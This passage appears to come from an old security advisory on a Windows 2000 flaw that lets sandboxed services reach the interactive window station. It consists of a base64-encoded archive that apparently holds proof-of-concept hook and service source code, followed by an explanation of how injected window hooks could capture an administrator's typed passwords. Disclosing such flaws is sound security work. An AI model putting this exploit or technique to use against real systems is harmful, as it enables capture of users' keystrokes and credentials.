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
bdossoJxpHnXOqVb63EBl1nAQP4qAycY8xKmkX25WN4jdjq959MfkrpzpdHY+/e4DyZjjxV1
5fGoCA16jFafhb8y9YNPA44ujVWOmrQoMkPLszpvdNnmQolmAZ7ymA9nWpaSj9VplXhhMCqd
JUNNPhHzpJbYYFOW95Wn4yUkTEk1mPgC2HyVYKOS5fDcAVKwOQuc+jH5kbIwyl5ciZnAZ9Zr
1xtG1tUODxtSPH8x3xHDJoHr5dTxt5U8ULiYilT0/pSYzYIeU2PgObQPUo7cMHuSggdJYGul
MUlnAabMmpeswXJNDTrMY6KnpZI0lDHIV+diGUe/KBeCug59TkLwE+X6PkYa/Ap2G/n/bnCP
jsKScXX1D1BLAQIyCxQAAgAIAE5dUSgQ5eV9EQMAAAUHAAArAAAAAAAAAAEAIAC2gQAAAAB3
Mmtfd2luc3RhX2J1Z19ob29rL3cya193aW5zdGFfYnVnX2hvb2suY3BwUEsBAjILFAACAAgA
tl1RKM+t7UtPBAAArBEAACsAAAAAAAAAAQAgALaBWgMAAHcya193aW5zdGFfYnVnX2hvb2sv
dzJrX3dpbnN0YV9idWdfaG9vay5kc3BQSwECMgsUAAIACADgXFEowcdJztkAAAAxAgAAKwAA
AAAAAAABACAAtoHyBwAAdzJrX3dpbnN0YV9idWdfaG9vay93Mmtfd2luc3RhX2J1Z19ob29r
LmRzd1BLAQIyCxQAAgAIALZdUSiLmjj+aAgAAAC+AAArAAAAAAAAAAEAIAC2gRQJAAB3Mmtf
d2luc3RhX2J1Z19ob29rL3cya193aW5zdGFfYnVnX2hvb2sub3B0UEsBAjILFAACAAgAWV5R
KMSGVsxuCQAA0h0AACYAAAAAAAAAAQAgALaBxREAAHcya193aW5zdGFfYnVnX3N2Yy9zZXJ2
aWNlX2ZyYW1ld2suY3BwUEsBAjILFAACAAgAC21QKLJJrN+eAQAAnAIAACkAAAAAAAAAAQAg
ALaBdxsAAHcya193aW5zdGFfYnVnX3N2Yy93Mmtfd2luc3RhX2J1Z19zdmMuY3BwUEsBAjIL
FAACAAgAk11RKGj77/lKBAAAXxEAACkAAAAAAAAAAQAgALaBXB0AAHcya193aW5zdGFfYnVn
X3N2Yy93Mmtfd2luc3RhX2J1Z19zdmMuZHNwUEsBAjILFAACAAgAMGtQKLqqna3YAAAALwIA
ACkAAAAAAAAAAQAgALaB7SEAAHcya193aW5zdGFfYnVnX3N2Yy93Mmtfd2luc3RhX2J1Z19z
dmMuZHN3UEsBAjILFAACAAgAbF5RKEzmdoSGDQAAAL4AACkAAAAAAAAAAQAgALaBDCMAAHcy
a193aW5zdGFfYnVnX3N2Yy93Mmtfd2luc3RhX2J1Z19zdmMub3B0UEsBAjILFAAAAAgAVGFR
KO1cshF+AgAACgUAAAoAAAAAAAAAAQAgALaB2TAAAHJlYWRtZS50eHRQSwUGAAAAAAoACgBM
AwAAfzMAAAAA
-----
SOLUTION
Microsoft has not documented that the security constraints on
window stations and desktops has been changed in Windows 2000, so
not sure what this means.
Administrators who choose to run services as SYSTEM are installing
those services into the Trusted Computing Base, where they
effectively have "root" privileges on the machine. Those services
can do pretty much whatever they please, including modifying the
DACLs on the interactive window station and desktop.
Administrators who choose to run services as distinguished
principals (typically these principals are not even members of the
Administrators local group) are making a statement that they wish
to sandbox those services. It's these "sandboxed" services that
appear to have illicit access to the interactive window station
and desktop in Windows 2000 RTM. Anything the interactive user is
typing or viewing on the interactive desktop is up for grabs, so
effectively the sandbox has a major leak. This is where the
vulnerability lies.
Note also that this is a *window station* vulnerability. This is
not a *logon session* vulnerabilty; services aren't going to be
able to use the interactive user's network credentials (or even
their local credentials) directly. What *could* happen if an
administrator is interactively logged on and is typing passwords
into User Manager (for example) and a previously "sandboxed"
service has injected code into Winsta0 that installs window hooks,
it could of course discover these passwords.